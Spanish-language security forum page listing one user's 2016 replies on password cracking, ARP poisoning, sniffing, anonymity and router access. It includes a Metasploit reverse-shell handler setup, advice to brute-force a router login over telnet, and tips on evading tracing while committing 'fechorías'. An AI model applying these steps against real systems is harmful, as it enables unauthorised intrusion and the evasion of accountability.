Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Cl0udswX

Páginas 1 ... 5 6 7 8 9 ... 48
#121
Dudas y pedidos generales / Re:Crackear password rar y zip
Agosto 19, 2016, 10:08:06 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
pues para ser los mejores no es que funcionen muy bien, jtr no le entiendo y no se si sirve par eso. Todos los videos son para passwrd d windows. Alguno más pero que funcione bien y esté completo y no de virus u otras cosas..

Debes entender que un si tienes un .rar con password no existe eso de "quitar el password" se le hace fuerza bruta para "adivinar" y cuando estamos "adivinando" el tiempo que se tome dependerá siempre de la longitud del pass (Justo como dijo Blackberry Blackdrake)

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Ya entiendo pero lo que quiero es abrir archivos con claves no los del sistema que ya me los se yo, ya que son mias. y no la de un archivo rar. Hay alguna manera de que busque solo en ese archivo y no todas las que pueda tener el equipo?. Si puede ser agregarle algo para que busque con gpu.

gracias

Aqui te perdi el rastro... ???

Como abrir archivos con clave?
#122
Dudas y pedidos generales / Re:Ayuda con R-sin
Agosto 19, 2016, 09:58:46 AM
Particularmente soy usuario de iphone desde hace muchos años y generalmente las veces que me ha tocado usar r-sim (turboSIM le decimos en mi pais) no he tenido mas problemas que el de no poder utilizar los codigos USSD (esos que sirven para consultar saldo, enviar balance, pagar facturas y solicitar opciones del proveedor).

Sobre las actualizaciones de IOS generalmente la version 9 del r-sim es capaz de soportar la actualizaciones del iOS hasta el mas reciente que es el 9.3.4 liberado en agosto de este mismo año.

Lo de liberar el carrier con Jailbreak ya no es posible desde la version 7.2, asi que mi sugerencia es que primero trates de liberarlo de factory, es decir full unlock y si es muy complicado, caro o demora mucho tiempo entonces te compres el r-sim 9 (suele ser el mas caro) y no tendras problema de actualizacion.

Saludos.
#123
Dudas y pedidos generales / Re:Proteger de sniffer sniffing
Agosto 18, 2016, 08:55:55 PM
A ver:

Si te conectas a una red inalambrica alguien podria snifar tus tramas, pero si estan cifradas no podria leerla asi por default. La opcion que comentas de que Wireshark puede descifrar https no es magia ni nada parecido, solamente si tienes los certificados ssl (porque los hayas importado, porque los hayas robado previamente, como sea...) solamente con eso podria alguin descifrar esas tramas.

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login compartio un buen post sobre el tema:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Pero si quieres evitar que te esnifen te recomiendo:

1.- Usar una VPN
2.- No conectarte a redes inseguras.
3.- Usar otro sistema DNS que funcione cifrado (DNSCrypt es muy bueno...)
4.- Evitar el trafico http y las redirecciones a sitios http, verifica que siempre sea httpS

Saludos.
#124
Dudas y pedidos generales / Re:Sniffing con Wireshark
Agosto 18, 2016, 08:45:08 PM
Desde linux podrias:

Crear una interfaz en modo monitor, haciendo:

Código: text
sudo airomon-ng start [nombre_de_tu_interfaz


Y luego en wireshark al seleccionar la interfaz con la que deseas capturar selecciona la "mon0" que acabas de crear.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Será porque todo el tráfico viajará por HTTPS.
Prueba con el navegador a entrar a sitios web que no tengan un certificado HTTPS.

Saludos

Aunque el trafico este cifrado igual debería poder ser interceptado, lo único es que no podremos leerlo, pero por ejemplo con las consultas DNS que viajan en texto plano no debería ser nada complicado.

Saludos.
#125
Dudas y pedidos generales / Re:¿Cómo puedo saber si alguien está haciendo Mitm o ARP Poison en mi red?
Agosto 18, 2016, 05:36:31 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Un arp poisoning se basa en envenenar la tabla arp de la victima spoofeando la dirección IP del gateway y asociándola con la MAC del atacante. Así que solo bastaría con ver en la tabla y verificar si la "mac del gateway" se encuentra asociada a otra ip en la red.



En este caso la IP 192.168.1.37 es la que se encuentra realizando el MITM.



Saludos.
#126
Dudas y pedidos generales / Re:Sniffering forzoso arp?
Agosto 18, 2016, 05:31:39 PM
A ver te explico:

Punto 1.-

Normalmente una red cableada es "conmutada" y eso significa que el switch que brinda acceso al medio conoce las direcciones MAC de cada equipo conectado a el, de esa forma si un Host A envia una trama a un Host B la envia con una direccion MAC de destino y el switch "conmutara" esa trama unicamente hacia el enlace que tiene conectado al Host B y ningun otro mas (a menos que sea una trama broadcast). Y eso lo logra con una tabla donde almacena las direcciones MAC registradas en las cabeceras de las tramas.

Esto significa que si quieres olfatear/capturar esa trama estando conectado a otro enlace (otra boca del switch) normalmente no podras.

Punto 2.-

Cada maquina tiene una tabla con las direcciones MAC de la mayoria de equipos en su misma red, si escribimos en un cmd esto:
Código: text
arp -a


Veriamos algo asi:



Donde podemos ver que hay una relacion entre las direcciones IP y las direcciones MAC de cada equipo, esto facilita la comunicacion entre los equipos, aumenta el rendimiento de la red y de cierta forma asegura que no sea tan sencillo olfatear la red.

Punto 3.-

Envenenar las tablas ARP no es mas que inundar la red con informacion falsa sobre nuestra direccion MAC en donde divulgamos que nuestra direccion MAC esta asociada a la direccion IP de nuestra victima, de la puerta de enlace, o de cualquier otro equipo dependiendo lo organizado del envenamiento. Luego si una trama va dirigida del Host A hasta el Host B podemos conseguir que la trama sea enviada al Host C donde tenemos algun snifer listo para capturar la trama. Incluso podriamos luego de leer, manipular o lo que sea que queramos hacerle volver a reenviar la trama a su destino real, y eso seria MitM.

Resumen:

CitarPara hacer sniffer siempre es necesario hacer antes mitm arp envenamiento o no tiene porqué ?

Si.

CitarPor qué siempre se habla de hacer sniffering con wireshark, pero wireshark no vale para hacer arp por si solo no?

No, no puedes hacer envenenamiento con wireshark, para eso se usa Ettercap.


Saludos por alla y cualquier cosa danos un toque.
#127
Dudas y pedidos generales / Re:Crackear password rar y zip
Agosto 15, 2016, 02:55:01 PM
Saludos.

Primero decirte que cada tipo de archivos tiene su metodo, asi que no creo que haya una misma aplicacion ó programa que pueda crackear las contraseñas de zip, rar y pdf.

Te dejo unos enlaces interesantes:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Si quieres algo que pueda funcionar tanto para .zip como para .rar entonces dale un ojo a esto:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Para crackear archivos .pdf te recomiendo esto:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Saludos.
#128
Dudas y pedidos generales / Re:Se puede obtener una sesion de meterpreter fuera de lan conectado a una vpn
Agosto 15, 2016, 10:17:34 AM
Pues si estas conectado usando una vpn de punto a punto, y la computadora donde quieres inciar la sesion de meterpreter esta al otro lado de la misma entonces deberia funcionarte normalmente, solo que cuando hagas el "set Lhost" al configurar el exploit debes poner la direccion IP de tu "VPN".

Mas o menos la idea es esta:

Código: text

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_vpn_ip
set LPORT your_local_port
exploit


Saludos.
#129
Dudas y pedidos generales / Re:Vpn con marca de internet
Agosto 15, 2016, 10:04:28 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Existe alguna vpn que tenga, la marca de internet de los paises que me puedan recomendar no importa si es premium ¡Gracias de AnteMano!

Saludos, hermano debes especificar un poco mas, ya que ese concepto de "marca de los paises" no dice mucho. Debes:

1.- Exponer tus dudas de forma clara.
2.- Si tienes una idea de lo que necesitas, entonces trata de comunicarla de forma clara.


De esa forma seguro podemos ayudarte.

Saludos.
#130
Dudas y pedidos generales / Re:Escaneo de maquina virtual Mac
Agosto 15, 2016, 10:01:25 AM
Podrias compartir las capturas del escaneo, o podrias copiarnos el resultado del escaneo?

Saludos.
#131
Dudas y pedidos generales / Re:No logro instalar ningun sistema operativo en virtualbox
Agosto 08, 2016, 07:42:30 PM
Tienes un problema en el sistema de particiones en el que intentas instalar.

1.- Borra todos los discos dinamicos que hayas creado tratando de instalar el SO.
2.- Posterior crea un disco dinamico para alojar el SO
3.- Activa PAE (no creo que tenga mucho que ver, pero es mejor dejar todo en orden)

Me imagino que el ISO que intentas instalar es 32bit...

Saludos.
#132
Dudas y pedidos generales / Re:Vulnerabilidad de servicio scanneado con NMAP
Agosto 03, 2016, 07:53:10 PM
Como dice @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login el orden logico es:

1.- Escaneas
2.- Busca informacion de los servicios (versiones lanzadas, cuales fallos eran parcheados en cad actualizacion, etc..)
3.- En algun portal como:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Busca a ver si se han reportado vulnerabilidades.

4.- De encontrar alguna busca algun exploit que puedas utilizar y un payload funcional para el mismo.


Saludos.
#133
Dudas y pedidos generales / Re:Saber la ip de una sala de chat de Ares que se esconde detras de un proxy
Agosto 03, 2016, 07:42:21 PM
Un tracert ó tracer_route dependiendo el sistema operativo es una herramienta que diagnostica el camino de un paquete desde su origen a su destino, siendo la primera linea el nodo mas cercano y por logica la ultima linea sera el nodo mas lejano (o destino final del paquete).

Saludos.

En el caso de hacer el tracert desde una web entonces la primera linea sera la direccion que use el server para hacer la traza (que puede ser otro proxy) y que en tu caso es 206.123.64.221  esto significa que ese es el nodo mas cercano al server que hace la traza, luego en la linea 6 y final esta la direccion IP de destino, que en este caso es la ip de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Código: text
172.217.2.164 is from United States (US) in region North America
Input: www.google.com
canonical name: www.google.com
Registered Domain: google.com

TraceRoute from Network-Tools.com to 172.217.2.164 [www.google.com]
Hop	(ms)	(ms)	(ms)		     IP Address	Host name
1 	  0 	  0 	  0 	     206.123.64.221	  -  
2 	  Timed out 	  Timed out 	  Timed out 	    	  -  
3 	  0 	  1 	  1 	     4.68.70.166	 google-level3-3x10g.dallas.level3.net  
4 	  1 	  1 	  1 	     108.170.240.194	  -  
5 	  1 	  1 	  1 	     209.85.254.125	  -  
6 	  1 	  1 	  1 	     172.217.2.164	 dfw06s40-in-f4.1e100.net  
Trace complete


Asi que la ultima linea sera la direccion que buscas. Cabe aclarar que es posible esconder las direcciones ip usando cosas tan sencillas como un Acces_List, una cadena de proxies, etc...

Ahora viene mi opinion personal, no se para que querrías la dirección IP de una sala de ares cuando no  puedes leer bien la salida de un tracert.

Lectura recomendada:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos.
#134
Dudas y pedidos generales / Re:Pc se queda completamente congelado
Agosto 02, 2016, 07:14:18 PM
Saludos.

"KMODE_EXCEPTION_NOT_HANDLED" error Stop cuando un controlador intenta cerrar secuencias estáticas para dispositivos USB 3.0 en Windows RT 8.1, Windows 8.1 o R2 de Windows Server 2012"

Síntomas

Suponga que ejecuta una aplicación que tiene un controlador que utiliza secuencias estáticas para dispositivos USB 3.0 en un equipo basado en Windows RT 8.1 8.1 de Windows o Windows Server R2 de 2012. Cuando el controlador carga el controlador Uasstor.sys para cerrar las secuencias, se bloquea el equipo.

Además, recibirá un mensaje de error Stop similar al siguiente:

KMODE_EXCEPTION_NOT_HANDLED

Causa

Este problema se produce porque el controlador no cierra los flujos dinámicamente. El controlador cierra incorrectamente las secuencias como parte de destruir el propio objeto de extremo.

Solución

Para resolver este problema, instale el paquete acumulativo de actualizaciones 2887595. Para obtener más información acerca de cómo obtener este paquete acumulativo de actualizaciones, haga clic en el número de artículo siguiente para verlo en Microsoft Knowledge Base:

2887595 Windows RT 8.1, 8.1 de Windows y Windows Server R2 de 2012 acumulativo: noviembre de 2013.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos
#135
Dudas y pedidos generales / Re:"ayuda con fruitywifi-karma" no puedo activar el modulo karma.
Agosto 02, 2016, 02:05:27 AM
Es mas sencillo si te ejecutas este script de la misma pagina de los creadores:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Todo servido.

Saludos y suerte..!!
#136
Dudas y pedidos generales / Re:Preguntas de un novato relativas a la criptografía/seguridad
Agosto 02, 2016, 01:50:59 AM
Citar1- ¿se debe complementar con otras ramas de la seguridad?
Pues sabiendo que la criptografia busca proteger el contenido de un mensaje que podria ser cualquier cosa  seria muy bueno y conveniente saber de que forma distintos protocolos se pueden basar sobre esta misma rama. Asi que mi respuesta va parecida a la de @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login no es totalmente necesario, pero es muy conveniente y suele ser lo mas normal.

Citar2- ¿Sinceramente vale la pena estudiar esto (perfeccionar) ?

Pues eso depende de que tan bueno llegues a ser (desarrollar nuevos algoritmos, violentar y romper los que ya existen, etc...) depende que tan profundo quieras llegar.

Saludos y animate..!!!
#137
Off Topic / Re:[UNDERtip] Trabajar con ordenadores y no morir en el intento
Julio 23, 2016, 08:27:22 PM
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login a mi tambien me cuesta mucho esa parte de tener los pies apoyados firmemente al suelo, en su mayoria los tengo doblados hacia atras, de puntas ó las piernas cruzadas con el portatil sobre ellas. Pero esa es la idea de los tips, tratar de mejorar nuestros habitos.

Sande gracias por tu inmensa ayuda, un abrazo...


Saludos.

#138
Dudas y pedidos generales / Re:Anonimato en la red usando kali linux 2.0
Julio 13, 2016, 12:23:39 AM
El anonimato total en la red es algo no muy cierto, ya que de cierta forma siempre se dejan migajas en algun lado, pero creo que lo mas cercano que tenemos hasta ahora es usar la distro "Tails" en modo live, ya que viene lista y configurada con navegacion obligatoria a traves de TOR, cifrado de mensajes, correos, ficheros, etc...



Asi como muchas chulerias mas...

Pero si en cambio necesitas todo el arsenal de Kali hay unas cuantas cosillas que puedes hacer:

1.- Usar alguna VPN de pago para navegar
2.- Evitar sitios publicos con mucha vigilancia (camaras)
3.- Tapa tu webcam (sonara paranoico, pero yo creo en eso.)
4.- Evitar tus habitos normales de navegacion.
5.- No loguearte en ninguna cuenta personal.
6.- Usar TOR (aunque ya uses la VPN) esto te da otra capa de seguridad.
7.- Si vas a realizar alguna fechoria no lleves tu smartphone contigo, es sencillo cruzar la ubicacion de tu dispositivo con otra conexion que se considere sospechosa.

Ummmmm......

No se que mas, por ahora.
#139
Dudas y pedidos generales / Re:Cisco DPC3825 - ADMIN
Julio 13, 2016, 12:14:38 AM
Lo primero a saber, has probado las contraseñas por defecto?

Has intentado dejar los campos de usuario y pass en blanco?

Si vas a hacer fuerza bruta es recomendable hacerlo via telnet, asi que lanza un nmap a la direccion del gateway y verifica que tenga el puerto 23 abierto, de ser asi busca algun manual de hydra ó medusa en el foro (Hace un tiempo creo escribi algo sobre el tema)

Saludos.

#140
Talleres Underc0de / Re:Taller de Redes #2
Julio 13, 2016, 12:01:11 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Genial!! Muchas gracias!! ¿Se sabe la fecha del próximo? :P

Ya tengo el temario y mas ó menos el esqueleto armado, espero que antes de mediados de agosto ya este listo y publicado.

P.D: Gracias por recibir de tan buena forma el esfuerzo que hacemos para brindarles buen material, espero lo compartan y se los hagan llegar a mas personas.

Saludos.
Páginas 1 ... 5 6 7 8 9 ... 48